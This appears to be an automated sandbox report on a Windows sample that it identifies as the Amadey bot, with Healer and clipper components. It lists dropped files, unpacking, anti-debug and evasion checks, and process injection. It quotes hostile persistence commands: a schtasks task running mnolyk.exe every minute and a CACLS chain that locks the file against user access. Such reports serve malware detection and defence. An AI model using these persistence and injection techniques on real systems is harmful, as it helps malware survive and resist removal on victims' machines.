Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wextract.pdb source: file.exe, bfCg.exe.0.dr
Source:	Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: file.exe, 00000000.00000003.250463432.0000000000D6E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.250204509.0000000004A2A000.00000004.00000020.00020000.00000000.sdmp, xriv.exe, 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmp, xriv.exe, 0000000B.00000003.316310103.0000000001682000.00000004.00000020.00020000.00000000.sdmp, xriv.exe, 0000000B.00000000.315748298.000000000138E000.00000002.00000001.01000000.00000009.sdmp, mnolyk.exe, 0000000C.00000002.775000934.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000000C.00000000.318162039.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000013.00000000.329735996.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000013.00000002.332650893.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000019.00000000.352215568.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000019.00000002.352736386.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001C.00000000.478701407.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001C.00000002.479552852.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001E.00000002.607657638.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001E.00000000.607327719.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001F.00000000.735938171.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001F.00000002.736512930.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe.11.dr, xriv.exe.0.dr
Source:	Binary string: Healer.pdb source: afCf.exe, 00000002.00000003.263047220.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, afCf.exe, 00000002.00000002.289378130.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, afCf.exe, 00000002.00000002.289207500.0000000002270000.00000004.08000000.00040000.00000000.sdmp, afCf.exe, 00000002.00000002.288764062.00000000020D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wextract.pdbGCTL source: file.exe, bfCg.exe.0.dr
Source:	Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: bfCg.exe, 00000001.00000003.250816625.0000000004D86000.00000004.00000020.00020000.00000000.sdmp, nika.exe, 00000006.00000000.290177703.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, nika.exe.1.dr
Source:	Binary string: _.pdb source: afCf.exe, 00000002.00000003.263047220.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, afCf.exe, 00000002.00000002.289378130.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, afCf.exe, 00000002.00000002.288764062.00000000020D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\wevepipes\ho.pdb source: bfCg.exe, 00000001.00000003.250816625.0000000004D49000.00000004.00000020.00020000.00000000.sdmp, afCf.exe, 00000002.00000000.250999613.0000000000401000.00000020.00000001.01000000.00000005.sdmp, afCf.exe.1.dr
Source:	Binary string: D:\Mktmp\Amadey\ClipperDLL\Release\CLIPPERDLL.pdb source: rundll32.exe, 00000016.00000002.775107488.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, clip64[1].dll.12.dr, clip64.dll.12.dr
Source:	Binary string: Healer.pdbH5 source: afCf.exe, 00000002.00000003.263047220.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, afCf.exe, 00000002.00000002.289378130.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, afCf.exe, 00000002.00000002.289207500.0000000002270000.00000004.08000000.00040000.00000000.sdmp, afCf.exe, 00000002.00000002.288764062.00000000020D0000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe

Unpacked PE file: 2.2.afCf.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe

Unpacked PE file: 2.2.afCf.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EB724D push ecx; ret	0_2_00EB7260
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	Code function: 1_2_0094724D push ecx; ret	1_2_00947260
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_0041C40C push cs; iretd	2_2_0041C4E2
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00423149 push eax; ret	2_2_00423179
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_0041C50E push cs; iretd	2_2_0041C4E2
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_004231C8 push eax; ret	2_2_00423179
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_0040E21D push ecx; ret	2_2_0040E230
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_0041C6BE push ebx; ret	2_2_0041C6BF
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_0067C125 push ebx; ret	2_2_0067C126
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_0066E484 push ecx; ret	2_2_0066E497
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_0067BE73 push cs; iretd	2_2_0067BF49
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_0067BF75 push cs; iretd	2_2_0067BF49
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_0085C693 push edi; retf	2_2_0085C694
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00859748 push FFFFFFE1h; ret	2_2_00859757
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 11_2_01377D26 push ecx; ret	11_2_01377D39
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 11_2_0136F748 push E8FFFFFBh; iretd	11_2_0136F74D

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00EB202A memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,GetModuleFileNameA,LocalAlloc,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,

0_2_00EB202A

Source: nika.exe.1.dr

Static PE information: 0xE382D401 [Fri Dec 15 06:19:45 2090 UTC]

Persistence and Installation Behavior

Yara detected Amadey bot

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0000000C.00000002.775069911.0000000000D1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.775069911.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.775069911.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	File created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	File created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	File created: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	File created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\clip64[1].dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EB1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,		0_2_00EB1AE8
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	Code function: 1_2_00941AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,		1_2_00941AE8

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F

Creates an undocumented autostart registry key

Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe TID: 3804	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe TID: 3868	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 1332	Thread sleep count: 64 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 1332	Thread sleep time: -1920000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 6028	Thread sleep time: -50000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 6044	Thread sleep count: 52 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 6044	Thread sleep time: -9360000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 5992	Thread sleep count: 47 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 1332	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 4840	Thread sleep count: 189 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 4840	Thread sleep time: -189000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe

2_2_004019F0

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess			graph_2-24623
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep			graph_2-24363

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Thread delayed: delay time: 180000	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes			graph_1-2575
Source: C:\Users\user\Desktop\file.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes			graph_0-2444

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe

API coverage: 6.9 %

Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\clip64[1].dll

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Thread delayed: delay time: 50000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Thread delayed: delay time: 30000	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe

API call chain: ExitProcess graph end node

graph_2-24625

Source: xriv.exe, 0000000B.00000002.318710664.0000000001688000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00EB5467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,

0_2_00EB5467

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EB2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_00EB2390
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	Code function: 1_2_00942390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	1_2_00942390
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 11_2_0137FC58 FindFirstFileExW,	11_2_0137FC58

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe

2_2_004019F0

Source: C:\Users\user\Desktop\file.exe

0_2_00EB202A

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_0066092B mov eax, dword ptr fs:[00000030h]	2_2_0066092B
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00660D90 mov eax, dword ptr fs:[00000030h]	2_2_00660D90
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00857C33 push dword ptr fs:[00000030h]	2_2_00857C33
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 11_2_0137A9A1 mov eax, dword ptr fs:[00000030h]	11_2_0137A9A1
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 11_2_0137CFB2 mov eax, dword ptr fs:[00000030h]	11_2_0137CFB2

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe

Code function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

2_2_0040CE09

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe

Code function: 2_2_0040ADB0 GetProcessHeap,HeapFree,

2_2_0040ADB0

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EB6F40 SetUnhandledExceptionFilter,	0_2_00EB6F40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EB6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00EB6CF0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	Code function: 1_2_00946F40 SetUnhandledExceptionFilter,	1_2_00946F40
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe	Code function: 1_2_00946CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00946CF0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0040CE09
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0040E61C
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00416F6A
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_004123F1 SetUnhandledExceptionFilter,	2_2_004123F1
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_0066D070 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0066D070
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_0066E883 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0066E883
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_006771D1 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_006771D1
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: 2_2_00672658 SetUnhandledExceptionFilter,	2_2_00672658
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 11_2_01377A74 SetUnhandledExceptionFilter,	11_2_01377A74
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 11_2_0137790F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_0137790F
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 11_2_0137BB20 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_0137BB20
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Code function: 11_2_01377208 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_01377208

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe

Code function: 11_2_013638C0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,VirtualFree,

11_2_013638C0

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe	Process created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y\|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /E	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /E	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00EB17EE LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary,

0_2_00EB17EE

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: GetLocaleInfoA,		2_2_00417A20
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Code function: GetLocaleInfoA,		2_2_00677C87

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe VolumeInformation	Jump to behavior
